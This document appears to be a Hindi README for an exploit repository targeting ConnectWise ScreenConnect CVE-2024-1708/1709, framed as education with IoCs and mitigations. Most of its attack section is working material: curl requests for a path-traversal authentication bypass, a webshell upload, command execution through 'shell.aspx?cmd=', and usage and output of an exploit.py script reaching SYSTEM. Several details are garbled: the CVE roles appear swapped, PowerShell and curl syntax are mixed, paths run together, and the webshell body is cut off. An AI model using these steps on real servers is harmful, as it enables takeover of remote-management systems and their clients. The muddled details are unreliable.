
cve-2024-1708-connectwise_rce_reproduction का पुनरुत्पादन
CVSS स्कोर: 8.4 (CVE-2024-1708) – 10.0 (CVE-2024-1709)
CWE: CWE-22 (पाथ ट्रैवर्सल), CWE-288 (वैकल्पिक पथ का उपयोग करके प्रमाणीकरण बाईपास)
प्रभावित सॉफ़्टवेयर: ConnectWise ScreenConnect (पूर्व में ScreenConnect) ≤ 23.9.7
खोज और रिपोर्ट: फरवरी 2024
जंगली में शोषण: LockBit, Black Basta, Bl00dy, और अन्य रैंसमवेयर सहयोगी
CVE-2024-1708 और CVE-2024-1709, ConnectWise ScreenConnect (पूर्व में ConnectWise Control) में कमजोरियों की एक श्रृंखलाबद्ध जोड़ी हैं जो मिलकर एक अप्रमाणित दूरस्थ हमलावर को ScreenConnect सर्वर पर पूर्ण रिमोट कोड निष्पादन प्राप्त करने की अनुमति देती हैं।
CVE-2024-1708 — पाथ ट्रैवर्सल के माध्यम से प्रमाणीकरण बाईपास। SetupWizard.aspx एंडपॉइंट (और संबंधित सेटअप/अपग्रेड एंडपॉइंट) उपयोगकर्ता द्वारा आपूर्ति किए गए पाथ ट्रैवर्सल अनुक्रमों (../) को ठीक से सैनिटाइज़ नहीं करता है। एक अप्रमाणित हमलावर इच्छित सेटअप निर्देशिका से बाहर ट्रैवर्स कर सकता है और उन एंडपॉइंट्स तक पहुँच सकता है जिन्हें प्रमाणीकरण की आवश्यकता होती है। चूंकि विज़ार्ड SYSTEM (Windows) या root (Linux) खाते के संदर्भ में चलता है, हमलावर को उन्नत विशेषाधिकार विरासत में मिलते हैं।
CVE-2024-1709 — RCE की ओर ले जाने वाला अप्रतिबंधित फ़ाइल अपलोड। एक बार प्रमाणीकरण बाईपास हो जाने पर, हमलावर वेब रूट में एक मनमानी .aspx या अन्य निष्पादन योग्य फ़ाइल अपलोड कर सकता है। फिर अपलोड की गई फ़ाइल का अनुरोध करके, सर्वर पर मनमाना कोड निष्पादित होता है।
ये कमजोरियां 19 फरवरी, 2024 से बड़े पैमाने पर शोषित की गईं, कई रैंसमवेयर समूहों द्वारा:
| रैंसमवेयर समूह | अभियान नोट |
|---|---|
| LockBit | ScreenConnect इंस्टेंस की व्यापक स्कैनिंग; डाउनस्ट्रीम में LockBit एन्क्रिप्टर तैनात करने के लिए उपयोग किया गया। |
| Black Basta | प्रबंधित क्लाइंट नेटवर्क में घुसपैठ करने के लिए MSP तक पहुँच का लाभ उठाया। |
| Bl00dy | बिना पैच वाले ScreenConnect सर्वरों को लक्षित करने वाले छोटे पैमाने के अभियान। |
चूंकि ScreenConnect आमतौर पर प्रबंधित सेवा प्रदाताओं (MSPs) द्वारा सैकड़ों डाउनस्ट्रीम क्लाइंट एंडपॉइंट्स को दूरस्थ रूप से प्रबंधित करने के लिए तैनात किया जाता है, एक ही समझौता किया गया ScreenConnect सर्वर सप्लाई-चेन हमले को सक्षम बनाता है — उस ScreenConnect सर्वर से जुड़े एजेंट वाला हर क्लाइंट जोखिम में है।
ScreenConnect सर्वर निम्न पते पर एक सेटअप विज़ार्ड प्रदर्शित करता है:
/SetupWizard.aspx/
कुछ अपग्रेड/मरम्मत स्थितियों में, सर्वर प्रमाणीकरण लागू नहीं करता है क्योंकि यह मानता है कि सेटअप विज़ार्ड पहली बार चलाने का अनुभव है। महत्वपूर्ण दोष यह है कि विज़ार्ड नेमस्पेस के तहत पथों तक पहुँचते समय सर्वर __Session कुकी या Transfer-Encoding / Content-Type हेडर को कैसे संसाधित करता है।
निम्न अनुरोध भेजकर:
/SetupWizard.aspx/../../ScreenConnect/Login.aspx
पाथ ट्रैवर्सल "सेटअप विज़ार्ड" संदर्भ को रद्द कर देता है, जबकि सर्वर अभी भी मानता है कि अप्रमाणित सत्र संदर्भ लागू होता है। हमलावर को ऐसे रीडायरेक्ट किया जाता है या पृष्ठ परोसे जाते हैं जैसे कि वह प्रमाणित हो।
वैकल्पिक वेक्टर: PrepareUpgrade.aspx / PostUpgrade.aspx हैंडलर में समान रूप से प्रमाणीकरण जाँच का अभाव है और वे फ़ाइल अपलोड कार्यक्षमता उजागर करते हैं।
एक बार हमलावर किसी प्रमाणित एंडपॉइंट तक पहुँच जाता है (या सेटअप संदर्भ में फ़ाइल अपलोड हैंडलर को सीधे हिट करता है), वे एक दुर्भावनापूर्ण .aspx वेबशेल अपलोड कर सकते हैं:
POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
Content-Type: multipart/form-data; boundary=----BOUNDARY
------BOUNDARY
Content-Disposition: form-data; name="file"; filename="shell.aspx"
Content-Type: application/octet-stream
<%@ Page Language="C#" %>...
------BOUNDARY--
फ़ाइल वेब एप्लिकेशन निर्देशिका (जैसे, C:\Program Files\ScreenConnect\Website\) में लिखी जाती है। अपलोड की गई शेल का अनुरोध करने पर यह सर्वर की पहचान के तहत निष्पादित होती है।
SetupWizard.aspx हैंडलर भरोसा करता है कि उसके रूट के तहत कोई भी अनुरोध सेटअप प्रक्रिया का हिस्सा है और उसे प्रमाणीकरण बाईपास करना चाहिए — लेकिन पाथ ट्रैवर्सल उस धारणा को तोड़ देता है।../ अनुक्रमों या सिमलिंक ट्रैवर्सल का कोई उचित सत्यापन नहीं।| संस्करण सीमा | स्थिति |
|---|---|
| 23.9.7 और उससे नीचे | असुरक्षित |
| 23.9.8 | पैच किया गया (20 फरवरी, 2024 को जारी) |
| 23.9.9 | पैच किया गया |
| 23.9.10 (नवीनतम) | पैच किया गया |
नोट: सेल्फ-होस्टेड (ऑन-प्रिमाइसेस) ScreenConnect सर्वर प्राथमिक लक्ष्य हैं। ConnectWise-होस्टेड (क्लाउड) ScreenConnect इंस्टेंस सार्वजनिक प्रकटीकरण से पहले पैच किए गए थे और कभी असुरक्षित नहीं थे।
C:\Program Files\ScreenConnect\/opt/screenconnect/# संस्करण जांचें
curl -s http://<target>:8040/ | Select-String "ScreenConnect"
या वेब इंटरफ़ेस तक पहुँचें और पृष्ठ स्रोत में संस्करण संख्या नोट करें।
curl -v --path-as-is "http://<target>:8040/SetupWizard.aspx/../../ScreenConnect/Login.aspx"
असुरक्षित सर्वर पर अपेक्षित व्यवहार:
curl -X POST "http://<target>:8040/SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx" \
-H "Content-Type: multipart/form-data; boundary=----BOUNDARY" \
-F "[email protected]"
curl "http://<target>:8040/shell.aspx?cmd=whoami"
साथ में दी गई exploit.py स्क्रिप्ट उपरोक्त चरणों को स्वचालित करती है:
usage: exploit.py [-h] -t TARGET [-p PORT] [-c COMMAND] [--ssl]
Exploit CVE-2024-1708/1709 - ConnectWise ScreenConnect Auth Bypass + RCE
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Target hostname or IP
-p PORT, --port PORT Target port (default: 8040)
-c COMMAND, --command COMMAND
Command to execute (default: whoami)
--ssl Use HTTPS
Example:
python exploit.py -t 192.168.1.100 -p 8040 -c "whoami"
$ python exploit.py -t 192.168.1.100 -c "whoami"
[*] Target: 192.168.1.100:8040
[*] Using SSL: False
[*] Step 1: Testing path traversal for auth bypass...
[+] Target appears vulnerable! Server version: 23.9.7
[*] Step 2: Uploading webshell...
[+] Webshell uploaded to: http://192.168.1.100:8040/PoCsAccSwLgSdE.aspx
[*] Step 3: Executing command 'whoami'...
[+] Output:
nt authority\system
वेब सर्वर लॉग में निम्नलिखित IoCs खोजें:
GET /SetupWizard.aspx/../../ScreenConnect/
POST /SetupWizard.aspx/../../ScreenConnect/UploadFile.aspx
GET /*.aspx?cmd=
यह रिपॉजिटरी केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान की गई है। उन प्रणालियों के खिलाफ अनधिकृत परीक्षण जिनके मालिक आप नहीं हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति आपके पास नहीं है, अवैध है। लेखक इस जानकारी के दुरुपयोग के लिए जिम्मेदार नहीं हैं।
| नियंत्रण | कार्यान्वयन |
|---|
| WAF नियम | /SetupWizard.aspx/ के बाद URL पथ में ../ वाले अनुरोधों को ब्लॉक करें |
| नेटवर्क सेगमेंटेशन | ScreenConnect को सख्त ईग्रेस फ़िल्टरिंग के साथ एक पृथक प्रबंधन VLAN में रखें |
| एक्सेस नियंत्रण | ScreenConnect वेब इंटरफ़ेस तक पहुँच को केवल विश्वसनीय IP रेंज तक सीमित करें |
| निगरानी | बाहरी स्रोतों से /SetupWizard.aspx/ के अनुरोधों, या ScreenConnect\Website\ में अप्रत्याशित .aspx फ़ाइल निर्माण पर अलर्ट करें |
| MFA | जबकि MFA इसे रोक नहीं पाएगा (प्रमाणीकरण बाईपास लॉगिन से पहले है), रक्षा-गहराई के लिए इसे सभी प्रशासनिक खातों पर लागू करें |
| स्रोत | URL |
|---|
| NVD - CVE-2024-1708 | https://nvd.nist.gov/vuln/detail/CVE-2024-1708 |
| NVD - CVE-2024-1709 | https://nvd.nist.gov/vuln/detail/CVE-2024-1709 |
| ConnectWise सुरक्षा सलाहकार | https://www.connectwise.com/company/trust/security-advisories |
| Huntress Labs - प्रारंभिक प्रकटीकरण | https://www.huntress.com/blog/mass-exploitation-of-connectwise-screenconnect |
| CISA ज्ञात शोषित कमजोरियां | https://www.cisa.gov/known-exploited-vulnerabilities |
| ATT&CK तकनीक: बाहरी दूरस्थ सेवाएं (T1133) | https://attack.mitre.org/techniques/T1133/ |